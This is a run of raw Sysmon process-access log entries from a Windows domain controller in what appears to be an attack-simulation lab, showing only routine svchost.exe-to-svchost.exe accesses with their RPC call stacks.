13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.508{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.508{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.508{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 